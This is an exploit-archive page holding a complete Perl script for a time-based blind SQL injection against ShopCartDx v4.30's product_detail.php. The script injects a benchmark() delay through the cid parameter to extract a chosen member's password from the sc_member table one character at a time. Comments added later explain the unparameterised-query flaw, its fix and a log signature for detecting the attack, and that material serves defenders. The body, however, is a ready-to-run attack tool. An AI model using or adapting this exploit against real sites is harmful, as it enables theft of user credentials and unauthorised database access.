
ShopCartDx <= v4.30 (product_detail.php) Blind SQL Inject

Posted on 30 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ShopCartDx &lt;= v4.30 (product_detail.php) Blind SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================
ShopCartDx &lt;= v4.30 (product_detail.php) Blind SQL Injection Exploit
====================================================================
#!/usr/bin/perl
#[0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#
# Reviewer notes (defensive reading of this listing):
#  - The underlying weakness is an unparameterised `cid` query parameter in
#    product_detail.php: the value reaches a SELECT unchanged, so a crafted cid can
#    append an IF(... benchmark(...)) expression. The application-side fix is to bind
#    cid as an integer (prepared statement / explicit cast) and reject non-numeric
#    values before any query is built.
#  - The only signal used is response time, so one request is issued per candidate
#    character (up to 15 positions x 63 candidates), and every matching probe makes
#    the database run benchmark(200000000, ...). In web/DB logs this appears as a
#    burst of GETs to product_detail.php whose cid contains `OR 1!=(SELECT IF(`,
#    `SUBSTRING(` and `benchmark(`, each taking several seconds -- an easy WAF/IDS
#    and slow-query signature.
#  - HTTP::Request::Common and IO::Socket are imported but not used below.
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
# File-scope state shared by the main loop and the helpers; request() writes
# $Start/$End/$Time/$Response, the loop writes $Hash/$Time_Start/$Time_End.
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
# ASCII codes of 0-9, A-Z, a-z: the candidate alphabet tried at every password position.
my @chars = (48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122);
my $Host = &quot;http://www.victime_site.org/path/&quot;; #Insert Victime Web Site Link (Example: http://e-topbiz.com/trafficdemos/shopcartdx1/)
my $Member_ID = shift or &amp;usage; # first CLI argument = sc_member.mid whose password is read; none -> usage() and exit
my $Method = HTTP::Request-&gt;new(GET =&gt; $Host); # plain GET to $Host, reused by request() for timing
my $HTTP = new LWP::UserAgent;
my $Referrer = &quot;http://www.warwolfz.org/&quot;;
# Baseline: seconds taken by an un-injected GET to $Host. It is only displayed by
# refresh(); the match threshold in the loop below is a fixed 6 s.
my $DefaultTime = request($Referrer);
# Builds the probe path. $dec = 1-based character position in sc_member.password,
# $hex = candidate ASCII code (an element of @chars, despite the name). The SELECT
# only runs benchmark() -- i.e. only delays the response -- when the character matches.
sub Blind_SQL_Jnjection{
    my ($dec,$hex) = @_;
    return &quot;./product_detail.php?cid=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `sc_member` WHERE `mid`=${Member_ID})/*&quot;;
}
for(my $I=1; $I&lt;=15; $I++){ #N Hash characters
    for(my $J=0; $J&lt;=62; $J++){ #0-9, A-Z, a-z
        # Wall-clock the probe with time() (1 s resolution); the GET's own response is discarded.
        $Time_Start = time();
        $HTTP-&gt;get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
        $Time_End = time();
        $Time = request($Referrer); # re-measure the un-injected request for the status display
        refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
        # A probe slower than 6 s is taken as "character matched".
        if($Time_End - $Time_Start &gt; 6){
            $Time = request($Referrer);
            refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
            if($Time_End - $Time_Start &gt; 6){
                # Echo the recovered character, append it to $Hash and move to the next position.
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Referrer);
                refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
                last;
            }
        }
    }
    if($I == 1 &amp;&amp; length $Hash &lt; 0 &amp;&amp; !$Hash){
        print &quot; * Exploit Failed * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        exit;
    }
    # Success banner once all 15 positions are done, or when this position produced
    # no match (nothing was appended, so $Hash is shorter than $I).
    if($I == 15 || length $Hash &lt; $I){
        print &quot; * Exploit Successfully Executed * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        system(&quot;pause&quot;); # Windows cmd.exe built-in
    }
}
# Prints the banner and usage text, then exits; reached via &amp;usage when no member id is given.
sub usage{
    system(&quot;cls&quot;); # Windows cmd.exe built-in: clear the console
    {
        print &quot; [0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        print &quot; * USAGE: * &quot;;
        print &quot; * cd [Local Disk]:\[Directory Of Exploit]\ * &quot;;
        print &quot; * perl name_exploit.pl [uid] * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        print &quot; * Powered By Dante90, WaRWolFz Crew * &quot;;
        print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
    };
    exit;
}
# Sends $Method (the plain GET to $Host) with the Referer header set to $_[0] and
# returns the elapsed seconds measured with Time::HiRes. Dies (with $Host and the
# HTTP status message) unless the response is a success.
sub request{
    $Referrer = $_[0];
    $Method-&gt;referrer($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP-&gt;request($Method);
    $Response-&gt;is_success() or die &quot;$Host : &quot;, $Response-&gt;message,&quot; &quot;;
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
# Redraws the console: banner plus current progress. Positional arguments:
#   $_[0] host, $_[1] baseline seconds, $_[2] index into @chars being tried,
#   $_[3] password recovered so far, $_[4] last measured request time, $_[5] position.
sub refresh{
    system(&quot;cls&quot;); # Windows cmd.exe built-in: clear the console
    {
        print &quot; [0-Day] ShopCartDx &lt;= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        print &quot; * USAGE: * &quot;;
        print &quot; * cd [Local Disk]:\[Directory Of Exploit]\ * &quot;;
        print &quot; * perl name_exploit.pl [uid] * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
        print &quot; * Powered By Dante90, WaRWolFz Crew * &quot;;
        print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org * &quot;;
        print &quot; ------------------------------------------------------ &quot;;
    };
    print &quot; * Victime Site: &quot; . $_[0] . &quot; &quot;;
    print &quot; * Default Time: &quot; . $_[1] . &quot; seconds &quot;;
    print &quot; * BruteForcing Hash: &quot; . chr($chars[$_[2]]) . &quot; &quot;;
    print &quot; * BruteForcing N Char Hash: &quot; . $_[5] . &quot; &quot;;
    print &quot; * SQL Time: &quot; . $_[4] . &quot; seconds &quot;;
    print &quot; * Password: &quot; . $_[3] . &quot; &quot;;
}
#WaRWolFz Crew
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 
